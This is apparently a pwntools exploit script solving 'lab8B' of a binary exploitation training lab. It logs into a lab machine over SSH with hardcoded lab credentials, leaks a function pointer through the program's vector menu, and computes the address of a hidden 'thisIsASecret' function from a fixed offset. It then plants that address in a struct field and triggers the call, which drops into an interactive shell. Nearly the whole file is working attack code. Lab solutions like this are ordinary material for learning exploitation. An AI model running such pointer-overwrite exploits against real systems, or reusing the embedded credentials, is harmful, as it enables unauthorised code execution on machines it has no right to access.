#! /usr/bin/python2.7
# -*- coding: utf-8 -*-
from pwn import *

s =  ssh(host='192.168.0.18', user='lab8B', password='3v3ryth1ng_Is_@_F1l3')
p = s.process('/levels/lab08/lab8B')

# command to get the address
p.recvuntil("I COMMAND YOU TO ENTER YOUR COMMAND: ")
p.sendline("1")
p.recvuntil("Which vector? ")
p.sendline("1")
p.recvuntil("char a: ")
p.sendline("1")
p.recvuntil("short b: ")
p.sendline("1")
p.recvuntil("unsigned short c: ")
p.sendline("1")
p.recvuntil("int d: ")
p.sendline("1")
p.recvuntil("unsigned int e: ")
p.sendline("1")
p.recvuntil("long f: ")
p.sendline("1")
p.recvuntil("unsigned long g: ")
p.sendline("1")
p.recvuntil("long long h: ")
p.sendline("1")
p.recvuntil("unsigned long long i: ")
p.sendline("1")
p.recvuntil("I COMMAND YOU TO ENTER YOUR COMMAND: ")
p.sendline("3")
p.recvuntil("Which vector? ")
p.sendline("1")

p.recvline()
leak_address = p.recvline()
leak_address = leak_address.split(" ")[2]
leak_address = leak_address.split("\n")[0]
# @ thisIsASecret = 0x000000a7
# @ printFunc = 0x000000e9
# offset 0x0e9 - 0x0a7 = 0x42 = 66
system_address = int(leak_address[2:],16) - 66

# first vector
p.recvuntil("I COMMAND YOU TO ENTER YOUR COMMAND: ")
p.sendline("1")
p.recvuntil("Which vector? ")
p.sendline("1")
p.recvuntil("char a: ")
p.sendline("1")
p.recvuntil("short b: ")
p.sendline("1")
p.recvuntil("unsigned short c: ")
p.sendline("1")
p.recvuntil("int d: ")
p.sendline("1")
p.recvuntil("unsigned int e: ")
p.sendline("1")
p.recvuntil("long f: ")
p.sendline("1")
p.recvuntil("unsigned long g: ")
# because a parameter can be equal to 0. It is for the second vector.
p.sendline(str(system_address -1 ))
p.recvuntil("long long h: ")
p.sendline("1")
p.recvuntil("unsigned long long i: ")
p.sendline("1")

# second vector
p.recvuntil("I COMMAND YOU TO ENTER YOUR COMMAND: ")
p.sendline("1")
p.recvuntil("Which vector? ")
p.sendline("2")
p.recvuntil("char a: ")
p.sendline("1")
p.recvuntil("short b: ")
p.sendline("1")
p.recvuntil("unsigned short c: ")
p.sendline("1")
p.recvuntil("int d: ")
p.sendline("1")
p.recvuntil("unsigned int e: ")
p.sendline("1")
p.recvuntil("long f: ")
p.sendline("1")
p.recvuntil("unsigned long g: ")
p.sendline("1")
p.recvuntil("long long h: ")
p.sendline("1")
p.recvuntil("unsigned long long i: ")
p.sendline("1")

p.recvuntil("I COMMAND YOU TO ENTER YOUR COMMAND: ")
p.sendline("2")

for x in range(1,8):
	p.recvuntil("I COMMAND YOU TO ENTER YOUR COMMAND: ")
	p.sendline("4")

p.recvuntil("I COMMAND YOU TO ENTER YOUR COMMAND: ")
p.sendline("6")
p.recvuntil("Which favorite? ")
p.sendline("6")
p.recvuntil("Which vector? ")
p.sendline("1")
p.recvuntil("I COMMAND YOU TO ENTER YOUR COMMAND: ")
p.sendline("3")
p.recvuntil("Which vector? ")
p.sendline("1")

p.interactive()